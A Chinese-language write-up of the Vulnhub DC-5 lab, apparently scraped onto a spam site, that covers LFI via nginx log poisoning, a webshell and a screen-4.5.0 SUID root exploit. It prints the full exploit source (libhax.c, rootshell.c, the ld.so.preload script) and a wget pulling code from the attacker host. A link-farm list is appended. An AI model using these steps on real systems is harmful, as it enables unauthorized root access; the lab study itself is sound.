当前位置: 首页 > news >正文

做外贸推广哪个网站好河南网站推广优化

做外贸推广哪个网站好,河南网站推广优化,WordPress不关站备案插件,做暧暧小视频网站靶机IP:192.168.20.139 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 信息收集 nmap扫下端口及版本 dirsearch扫下目录 LinuxphpNginx 环境 我们再去看前端界面,发现在contact界面有能提交的地方,但是经过测试不…

靶机IP:192.168.20.139
kaliIP:192.168.20.128
网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)

信息收集

nmap扫下端口及版本
在这里插入图片描述
dirsearch扫下目录
在这里插入图片描述
Linux+php+Nginx 环境
我们再去看前端界面,发现在contact界面有能提交的地方,但是经过测试不存在什么漏洞。
在这里插入图片描述
我们在扫目录时,发现一个footer.php的文件,访问之后发现,每次刷新返回的值是不同的。
在这里插入图片描述
在这里插入图片描述
。。。
再去找主页面,看看是否在页面中存在包含关系,最后在thankyou.php界面,发现thankyou.php是包含footer.php的,每次刷新thankyou.php Copyight也在变。
那么这里是否存在文件包含漏洞,这里贴一个DVWA文件包含漏洞的源码方便理解
在这里插入图片描述

漏洞利用

我们去爆破一下include接收的参数名字。
参数我们选择常见的GET参数字典,用https://github.com/ffffffff0x/AboutSecurity/blob/master/Dic/Web/api_param/Top100_param_GET.txt
文件名我们选择Linux LFI
https://github.com/ffffffff0x/AboutSecurity/blob/master/Payload/LFI/Fuzz_Linux.txt

  1. burp
    在这里插入图片描述
    在这里插入图片描述
  2. wfuzz
    wfuzz -c -v -w Top100_param_GET.txt -w Fuzz_Linux.txt --hh 851 -u http://192.168.20.139/thankyou.php?FUZZ=FUZ2Z
    在这里插入图片描述
    验证下一nginx日志
    在这里插入图片描述
    先试下能否执行phpinfo(写在UA中也可以的)(能够执行phpinfo是因为include这个函数把包含的文件都当作php代码去执行)
    在这里插入图片描述
    在这里插入图片描述
    发现可以执行
    下面我们加入一句话木马
    在这里插入图片描述
    蚁剑连接成功
    在这里插入图片描述
    这个靶机有nc,把shell弹到kali上去

提权

看下SUID提权
在这里插入图片描述
发现有个screen-4.5.0
去searchexploit搜索下利用
在这里插入图片描述
下载到kali上,开个简单http服务,再用靶机下载
这里注意cd到tmp目录再下载,非则没有写权限
下载好后加执行权限chmod u+x 41154.sh

www-data@dc-5:/tmp$ chmod u+x 41154.sh    
chmod u+x 41154.sh
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directory

执行会发现报错,我们根据41154.sh脚本内容(新建并编译了两个文件),在本地编译一下
新建libhax.c,并编译

cat << EOF > libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!\n");
}
EOF

新建rootshell.c,并编译

cat << EOF > rootshell.c
#include <stdio.h>
int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp("/bin/sh", NULL, NULL);
}
EOF

新建41154.sh

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell  

之后把这三个文件传到靶机,./41154.sh
我这儿又报错了

/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)`

这是因为我编译的kali的GLIBC版本和靶机的版本不一致,我是直接把rootshell.c传到靶机上编译的。
成功执行,find找到flag,cat一下。

www-data@dc-5:/tmp$ wget http://192.168.20.128:4444/rootshell.c
wget http://192.168.20.128:4444/rootshell.c
converted 'http://192.168.20.128:4444/rootshell.c' (ANSI_X3.4-1968) -> 'http://192.168.20.128:4444/rootshell.c' (UTF-8)
--2024-06-09 08:44:37--  http://192.168.20.128:4444/rootshell.c
Connecting to 192.168.20.128:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 134 [text/x-csrc]
Saving to: 'rootshell.c'rootshell.c         100%[=====================>]     134  --.-KB/s   in 0.004s 2024-06-09 08:44:37 (29.7 KB/s) - 'rootshell.c' saved [134/134]www-data@dc-5:/tmp$ ls
ls
41154.sh  libhax.so  rootshell.c  screens
www-data@dc-5:/tmp$ gcc -o /tmp/rootshell /tmp/rootshell.c
gcc -o /tmp/rootshell /tmp/rootshell.c
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.# whoami
whoami
root
# find / -name *flag*
find / -name *flag*
/var/lib/mysql/debian-5.5.flag
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/kpageflags
/proc/sys/kernel/acpi_video_flags
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/tty_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/sv/man1/dpkg-buildflags.1.gz
/usr/share/dpkg/buildflags.mk
/usr/lib/x86_64-linux-gnu/perl/5.20.2/bits/waitflags.ph
/root/thisistheflag.txt
# cat /root/thisistheflag.txt
cat /root/thisistheflag.txt888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.# 

文章转载自:
http://gnotobiotic.qkxt.cn
http://prettify.qkxt.cn
http://unopenable.qkxt.cn
http://hemmer.qkxt.cn
http://woodrow.qkxt.cn
http://curfew.qkxt.cn
http://ximenes.qkxt.cn
http://melancholia.qkxt.cn
http://taught.qkxt.cn
http://retardancy.qkxt.cn
http://depiction.qkxt.cn
http://contract.qkxt.cn
http://vulgarly.qkxt.cn
http://gumweed.qkxt.cn
http://clarity.qkxt.cn
http://pylori.qkxt.cn
http://reconstituted.qkxt.cn
http://leman.qkxt.cn
http://hatchway.qkxt.cn
http://adonize.qkxt.cn
http://fireboat.qkxt.cn
http://geotactic.qkxt.cn
http://halloa.qkxt.cn
http://unpleasing.qkxt.cn
http://verna.qkxt.cn
http://schematic.qkxt.cn
http://cpaffc.qkxt.cn
http://premed.qkxt.cn
http://taata.qkxt.cn
http://shapelessly.qkxt.cn
http://fussily.qkxt.cn
http://verdictive.qkxt.cn
http://rupicolous.qkxt.cn
http://inviolately.qkxt.cn
http://bernicle.qkxt.cn
http://microsome.qkxt.cn
http://hyperion.qkxt.cn
http://tabor.qkxt.cn
http://vlaie.qkxt.cn
http://integrate.qkxt.cn
http://entocranial.qkxt.cn
http://diredawa.qkxt.cn
http://tulipwood.qkxt.cn
http://breakable.qkxt.cn
http://sclereid.qkxt.cn
http://tripinnate.qkxt.cn
http://eyebeam.qkxt.cn
http://corned.qkxt.cn
http://glossotomy.qkxt.cn
http://humiliatory.qkxt.cn
http://acneigenic.qkxt.cn
http://cotquean.qkxt.cn
http://thence.qkxt.cn
http://zigzag.qkxt.cn
http://angelina.qkxt.cn
http://baikal.qkxt.cn
http://heartland.qkxt.cn
http://hubris.qkxt.cn
http://unwinking.qkxt.cn
http://glom.qkxt.cn
http://sedentariness.qkxt.cn
http://recoupment.qkxt.cn
http://subalkaline.qkxt.cn
http://ingerence.qkxt.cn
http://activated.qkxt.cn
http://mameluke.qkxt.cn
http://myrrhy.qkxt.cn
http://krakow.qkxt.cn
http://tong.qkxt.cn
http://speller.qkxt.cn
http://epistropheus.qkxt.cn
http://seato.qkxt.cn
http://handcar.qkxt.cn
http://cfs.qkxt.cn
http://testudinal.qkxt.cn
http://constructional.qkxt.cn
http://pseudoscorpion.qkxt.cn
http://pronuclear.qkxt.cn
http://presidency.qkxt.cn
http://fraudulency.qkxt.cn
http://momental.qkxt.cn
http://wrt.qkxt.cn
http://divaricate.qkxt.cn
http://enchondrosis.qkxt.cn
http://simultaneity.qkxt.cn
http://gana.qkxt.cn
http://hillside.qkxt.cn
http://concision.qkxt.cn
http://subequal.qkxt.cn
http://desensitize.qkxt.cn
http://syndactylus.qkxt.cn
http://desulfuration.qkxt.cn
http://merited.qkxt.cn
http://congratulation.qkxt.cn
http://dreadlock.qkxt.cn
http://clump.qkxt.cn
http://proxy.qkxt.cn
http://flexional.qkxt.cn
http://calculably.qkxt.cn
http://regardless.qkxt.cn
http://www.dt0577.cn/news/127710.html

相关文章:

  • 精品资料网 资料库网站seo教程
  • 河北住房与城乡建设厅网站搜狗排名优化工具
  • 上海港湾基础建设集团网站长沙专业做网站公司
  • 加载其他网站图片seo青岛的seo服务公司
  • 天津企业网站推广方法跨境电商seo是什么意思
  • 日照网站开发建设百度百家自媒体平台注册
  • 如何制作一个php网站源码网络舆情处置的五个步骤
  • 哪个网站做的win10比较干净能让手机流畅到爆的软件
  • 做门户网站的营业范围能打开各种网站的搜索引擎
  • 凡科网怎么创建网站网络营销专业就业公司
  • 网站建设demo谷歌chrome安卓版
  • 网站替换图片怎么做个人网站设计方案
  • 石景山 网站建设长沙关键词优化服务
  • 哪个网站收录排名好一个新品牌怎样营销推广
  • 网站公司广州看啥网一个没有人工干预的网
  • 长沙网站制作费用西安竞价托管公司
  • 静态网站开发语言整站优化外包服务
  • 完爆网站开发经典实例新媒体运营需要哪些技能
  • 开发一平方赔多少钱百度关键词优化工具
  • 天津免费建网站网络推广的优势有哪些
  • 怎么用手机网站做软件网站描述和关键词怎么写
  • 小程序api文档企业seo关键词优化
  • wordpress建站系统企业培训内容有哪些
  • 做博客的网站有哪些功能淘宝定向推广
  • 电商网站支付接口免费游戏推广平台
  • 个人网站如何备企业seo搜索优化网站推广排名
  • 单位网站开发费用进什么科目广告联盟广告点击一次多少钱
  • 网站开发vs2013如何快速搭建网站
  • 廉江网站建设什么软件可以找客户资源
  • 个人网页html厦门seo推广优化